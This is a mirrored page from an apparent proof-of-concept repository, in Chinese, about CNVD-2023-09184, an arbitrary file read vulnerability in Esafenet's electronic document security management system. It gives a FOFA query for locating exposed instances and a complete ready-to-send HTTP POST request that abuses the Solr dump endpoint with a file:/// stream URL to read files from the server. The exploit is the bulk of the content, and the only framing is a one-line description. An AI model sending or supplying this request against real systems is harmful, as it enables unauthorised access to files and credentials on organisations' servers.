mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
29 lines
928 B
Markdown
29 lines
928 B
Markdown
## 亿赛通电子文档安全管理系统任意文件读取CNVD-2023-09184
|
|
|
|
亿赛通 电子文档安全管理系统 dump接口存在任意文件读取漏洞
|
|
|
|
|
|
## fofa
|
|
```
|
|
app="亿赛通电子文档安全管理系统"
|
|
```
|
|
|
|
## poc
|
|
```
|
|
POST /solr/flow/debug/dump?param=ContentStreams HTTP/1.1
|
|
Host:
|
|
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
|
|
Connection: close
|
|
Content-Length: 36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
|
Accept-Encoding: gzip, deflate, br
|
|
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
|
Cache-Control: max-age=0
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Upgrade-Insecure-Requests: 1
|
|
|
|
stream.url=file:///C:\Program Files\
|
|
```
|
|
|
|

|